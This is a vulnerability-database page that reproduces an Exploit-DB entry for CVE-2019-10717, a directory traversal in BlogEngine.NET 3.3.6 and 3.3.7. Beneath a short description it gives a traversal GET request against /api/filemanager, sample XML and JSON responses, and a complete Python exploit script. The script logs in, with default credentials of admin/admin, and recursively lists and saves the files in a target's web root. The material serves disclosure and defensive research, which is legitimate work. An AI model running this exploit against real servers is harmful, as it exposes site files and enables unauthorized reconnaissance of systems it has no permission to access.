Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal

🗓️ 25 Jun 2019 00:00:00Reported by Aaron BishopType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 336 Views

BlogEngine.NET 3.3.6/3.3.7 Directory Traversal Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		BlogEngine.NET 3.3.6/3.3.7 - (path) Directory Traversal Vulnerability
26 Jun 201900:00
zdt
CNVD		BlogEngine path traversal vulnerability (CNVD-2019-21427)
5 Jul 201900:00
cnvd
CVE		CVE-2019-10717
3 Jul 201915:40
cve
Cvelist		CVE-2019-10717
3 Jul 201915:40
cvelist
exploitpack		BlogEngine.NET 3.3.63.3.7 - path Directory Traversal
25 Jun 201900:00
exploitpack
Nuclei		BlogEngine.NET 3.3.7.0 - Local File Inclusion
4 Jun 202603:48
nuclei
NVD		CVE-2019-10717
3 Jul 201916:15
nvd
Packet Storm		BlogEngine.NET 3.3.6 / 3.3.7 path Directory Traversal
25 Jun 201900:00
packetstorm
Prion		Directory traversal
3 Jul 201916:15
prion
RedhatCVE		CVE-2019-10717
22 May 202508:25
redhatcve
Rows per page
# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717

1. Description
==============

BlogEngine.NET is vulnerable to a directory traversal.  The page parameter, passed to /api/filemanager, reveals the contents of the directory.

2. Proof of Concept
=============

Log in to the application and submit a GET request to /api/filemanager:

Request:

~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: $COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
~~~

Depending on how the request is submitted, the response may be XML or JSON

XML Response

~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 01:58:46 GMT
Connection: close
Content-Length: 13030

<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
<FileInstance>
    <Created>5/14/2019 6:58:46 PM</Created>
    <FileSize></FileSize>
    <FileType>Directory</FileType>
    <FullPath>~/App_Data/files/../..</FullPath>
    <IsChecked>false</IsChecked>
    <Name>...</Name>
    <SortOrder>0</SortOrder>
</FileInstance>
...
~~~

JSON Response

~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 02:35:13 GMT
Connection: close
Content-Length: 10011

[
    {
        "IsChecked":false,
        "SortOrder":0,
        "Created":"5/14/2019 7:35:13 PM",
        "Name":"...",
        "FileSize":"",
        "FileType":0,
        "FullPath":"~/App_Data/files/../..",
        "ImgPlaceholder":""
    }
...
~~~

import argparse
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10717

CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Outputs list of filenames found in web root

python exploit.py -t $RHOST

?path=/../..
/../../archive.aspx
/../../archive.aspx.cs
/../../archive.aspx.designer.cs
/../../BlogEngine.NET.csproj
/../../BlogEngine.NET.csproj.user
/../../contact.aspx
/../../contact.aspx.cs
/../../contact.aspx.designer.cs
"""

urls = {
        "login": "/Account/login.aspx",
        "traversal": "/api/filemanager"
       }

def make_request(session, method, target, data={}):
    proxies = {
            "http": "127.0.0.1:8080",
            "https": "127.0.0.1:8080"
              }
    if method == 'GET':
        r = requests.Request(method, target, params=data)
    elif method == 'POST':
        r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text

def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host+urls.get('login'))
    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
    login_data = dict([(i[0],i[2]) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host+urls.get('login'), login_data)

def parse(body, path, outfile):
    paths = json.loads(body)
    new_paths = set()
    for i in paths:
        if i.get('FileType') == 0:
            new_paths.add(i.get('FullPath'))
        else:
            outfile.write("{path}\n".format(path=i.get('FullPath')))
    return new_paths

def traverse(session, host, paths, outfile, visited=set()):
    paths = set(paths) - visited
    for path in paths:
        print path
        outfile.write("\n?path={path}\n".format(path=path))
        visited.add(path)
        resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
        new_paths = parse(resp, path, outfile)
        if new_paths:
            traverse(session, host, new_paths, outfile, visited)

def main(host, user, passwd, root, outfile):
    with requests.Session() as s:
        login(s, host, user, passwd)
        traverse(s, host, root, outfile)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
    parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
    parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
    args = parser.parse_args()

    protocol = "https://" if args.ssl else "http://"
    if isinstance(args.root, str):
        args.root = [args.root]
    main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2019 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25.5
CVSS 37.1
EPSS0.11789
blogengine.netdirectory traversalcve-2019-10717exploitinformation securityvulnerability
336